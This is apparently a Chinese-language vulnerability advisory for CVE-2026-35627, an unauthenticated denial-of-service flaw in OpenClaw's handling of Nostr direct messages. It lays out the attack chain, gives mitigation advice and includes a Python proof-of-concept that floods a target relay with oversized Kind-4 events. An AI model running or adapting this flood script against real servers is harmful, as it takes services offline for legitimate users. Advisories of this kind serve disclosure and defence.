CVE-2026-35627 CVSS 6.5 中危

CVE-2026-35627 OpenClaw资源耗尽漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35627

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22 之前的版本存在严重的逻辑验证漏洞。在处理入站 Nostr 直接消息时，系统未按安全顺序执行检查，而是先进行了高耗资源的密码学运算与分发处理，随后才验证发送者身份及配对策略。此设计缺陷允许未经授权的攻击者通过发送精心构造的恶意消息，在绕过身份验证的情况下消耗服务器计算资源，最终导致服务拒绝响应。

技术细节

该漏洞的核心问题在于 OpenClaw 的消息处理流程中缺乏“先验证后计算”的原则。在受影响的版本中，当系统接收到入站的 Nostr 直接消息（DM）时，会立即触发对消息内容的解密操作以及后续的分发逻辑。这些操作通常涉及非对称加密解密，对 CPU 资源消耗较大。然而，系统在执行这些昂贵操作之前，并未检查消息发送者是否在白名单中或是否符合配对策略。攻击者利用这一缺陷，无需持有任何有效凭证，即可向目标服务器发送海量的恶意构造数据包。由于 CVSS 指标显示攻击复杂度低且无需用户交互，攻击者可以轻松编写脚本自动化发送请求，导致目标服务器 CPU 被大量无效任务占满，无法响应正常用户的请求，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者发现目标运行的是 OpenClaw 且版本低于 2026.3.22，并确定其 Nostr 中继接口地址。

STEP 2

载荷构造

攻击者编写脚本，构造大量特制的 Nostr 直接消息（Kind 4），这些消息包含旨在消耗计算资源的加密载荷。

STEP 3

漏洞触发

攻击者向目标服务器发送这些消息。由于未进行预认证验证，OpenClaw 接收到消息后立即开始解密和分发处理。

STEP 4

资源耗尽

服务器 CPU 和内存资源被大量的无效计算任务占用，导致系统负载过高，无法处理合法用户的请求。

STEP 5

拒绝服务

最终导致 OpenClaw 服务崩溃或无响应，达成拒绝服务攻击目的。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets
import json

# PoC for CVE-2026-35627: OpenClaw Unauthenticated DoS
# This script simulates sending malicious Nostr DMs to trigger resource exhaustion.

async def send_malicious_dm(uri):
    async with websockets.connect(uri) as websocket:
        # Construct a malicious Nostr event (Kind 4 is DM)
        # The content is crafted to trigger heavy cryptographic operations
        malicious_event = {
            "kind": 4,
            "content": "A" * 10000,  # Large payload to increase processing load
            "tags": [["p", "target_public_key_placeholder"]],
            "created_at": 1234567890,
            "pubkey": "attacker_public_key_placeholder"
        }
        
        # Simulate sending the event rapidly
        try:
            for _ in range(1000):
                message = json.dumps(["EVENT", malicious_event])
                await websocket.send(message)
                print("Sent malicious payload")
        except Exception as e:
            print(f"Error: {e}")

if __name__ == "__main__":
    target_relay = "ws://target-openclaw-instance:port"
    asyncio.get_event_loop().run_until_complete(send_malicious_dm(target_relay))

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

在无法立即修补的情况下，建议在网关层实施严格的速率限制和 IP 黑名单策略。由于该漏洞利用的是未认证的请求，暂时屏蔽未知的 IP 地址访问 Nostr 服务端口，或者仅允许受信任的节点连接，可以有效缓解攻击风险。同时，应密切监控服务器 CPU 使用率，一旦发现异常峰值立即介入排查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表